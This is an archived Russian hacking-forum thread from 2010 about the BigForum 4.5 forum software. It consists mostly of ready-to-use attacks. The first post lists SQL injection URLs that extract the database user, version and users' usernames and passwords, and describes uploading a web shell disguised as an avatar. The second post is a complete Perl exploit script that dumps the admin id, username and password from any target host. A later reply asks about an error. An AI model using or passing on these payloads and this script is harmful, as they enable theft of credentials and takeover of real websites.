Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

BigForum 4.5

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> BigForum 4.5
Имя
Сообщение << Старые топики   Новые топики >>
BigForum 4.5 - 2010-03-07 05:59:56.630000   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
SQL Injection:

quote:

/misc.php?aktion=adser&id=-1'+union+select+1,2,user(),4,5+–+

quote:

/profil.php?id=-1'+union+select+1,concat_ws(0x3a,id,username,pw),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users–+

quote:

/search.php

В Author / Erstellen
quote:

1u%' union select 1,2,3,4,5,6,7,8,9,10,11,12 –

quote:

/?do=show_one&id=-1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4+–+


Залитие шелла:

quote:

/main.php?do=ava&aktion=send

quote:

Выбираем как аватару шелл, и заливаем, /images/avatar/.


Post #: 1
BigForum 4.5 SQL INJ EXPLOIT. - 2010-03-07 06:01:14.636666   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
BigForum 4.5 SQL INJ EXPLOIT.

#!/usr/bin/perl use LWP::Simple; print "\n"; print "##############################################################\n"; print "# BigForum Version: 4.5 SQL INJECTION #\n"; print "# Author: Ctacok (Russian) #\n"; print "# Blog : www.Ctacok.ru #\n"; print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n"; print "# Require : Magic_quotes = Off #\n"; print "##############################################################\n"; if (@ARGV &lt; 2) { print "\n Usage: exploit.pl [host] [path] "; print "\n EX : exploit.pl www.localhost.com /path/ \n\n"; exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users"; $doc = get($host.$path."profil.php?id=".$vuln."+--+"); if ($doc =~ /:::(.+):(.+):(.+):::/){ print "\n[+] Admin id: : $1"; print "\n[+] Admin username: $2"; print "\n[+] Admin password: $3"; }
Post #: 2
RE: BigForum 4.5 SQL INJ EXPLOIT. - 2010-03-13 11:27:28.656666   
NEWS

Сообщений: 224
Оценки: 0
Присоединился: 2009-11-18 10:40:28.283333
union+select+1,concat eror что за ошибку выдаёт ?
Post #: 3
Страниц:  [1]
Все форумы >> [Уязвимости] >> BigForum 4.5







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.